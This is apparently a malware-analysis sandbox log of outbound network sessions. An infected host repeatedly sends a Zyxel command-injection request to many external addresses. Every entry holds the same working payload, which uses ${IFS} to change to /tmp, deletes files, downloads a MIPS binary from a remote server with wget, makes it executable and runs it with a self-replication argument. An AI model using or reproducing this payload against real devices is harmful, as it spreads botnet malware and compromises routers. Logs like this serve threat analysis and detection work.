                                              Jan 29, 2024 07:03:37.767132044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1282192.168.2.1437940130.120.27.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767155886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1283192.168.2.1447916129.86.13.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767179966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1284192.168.2.145756243.105.236.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767208099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1285192.168.2.1451158109.255.64.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767240047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1286192.168.2.1439358142.44.206.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767261028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1287192.168.2.1460804101.75.164.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767316103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1288192.168.2.145113052.17.127.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767374992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1289192.168.2.1447076202.119.19.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767409086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1290192.168.2.1444420192.160.91.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767461061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1291192.168.2.1445328175.217.137.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767478943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1292192.168.2.145371438.104.183.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767533064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1293192.168.2.1450676163.202.32.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767565012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1294192.168.2.1454126191.96.52.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767602921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1295192.168.2.1438078204.173.152.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767636061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1296192.168.2.1451516211.174.128.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767682076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1297192.168.2.144002882.201.20.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767716885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1298192.168.2.1436832204.122.243.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767764091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1299192.168.2.144795499.176.56.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767788887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1300192.168.2.143347682.124.178.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767847061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1301192.168.2.1458144157.55.59.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767867088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1302192.168.2.145791847.107.4.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767899990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1303192.168.2.144221620.70.66.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767937899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1304192.168.2.1446462202.16.201.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767955065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1305192.168.2.14346441.50.164.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768018007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1306192.168.2.144116652.207.201.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768065929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1307192.168.2.144423482.98.202.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768110991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1308192.168.2.144759650.243.191.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768136024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1309192.168.2.1456858200.218.212.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768182993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1310192.168.2.1444810111.123.9.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768218040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1311192.168.2.145475050.52.238.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768273115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1312192.168.2.144219045.95.40.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768282890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1313192.168.2.1444476222.43.6.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768311977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1314192.168.2.144422897.215.212.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768363953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1315192.168.2.1449416177.65.21.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768424988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1316192.168.2.1436082222.195.110.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768450022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1317192.168.2.1441722148.112.173.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768486023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1318192.168.2.145184672.137.201.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768551111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1319192.168.2.1457644175.15.155.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768595934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1320192.168.2.1451540118.214.132.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768626928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1321192.168.2.144579853.237.250.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768646002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1322192.168.2.1439406131.137.87.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768688917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1323192.168.2.14513444.19.212.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768721104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1324192.168.2.1445166204.162.134.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768774033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1325192.168.2.143675682.251.231.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768838882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1326192.168.2.145138679.166.10.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768845081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1327192.168.2.1436170176.34.76.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768858910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1328192.168.2.144921683.121.60.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768883944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1329192.168.2.144237884.44.14.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768938065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1330192.168.2.1446560124.199.140.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768971920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1331192.168.2.1439806167.237.213.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.768984079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1332192.168.2.145990043.211.44.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769041061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1333192.168.2.1441038194.81.152.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769068003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1334192.168.2.1451204178.171.46.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769094944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1335192.168.2.144163889.163.57.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769140005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1336192.168.2.1437100170.38.84.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769179106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1337192.168.2.143444658.158.47.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769217014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1338192.168.2.145132069.46.207.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769270897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1339192.168.2.143847814.225.150.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769320965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1340192.168.2.143350658.182.38.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769356012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1341192.168.2.1449896196.207.200.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769397974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1342192.168.2.145133478.178.241.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769445896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1343192.168.2.1456500136.32.141.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769484043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1344192.168.2.1450696202.117.75.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.769515991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1345192.168.2.1460354156.213.102.187443
                                              TimestampBytes transferredDirectionData
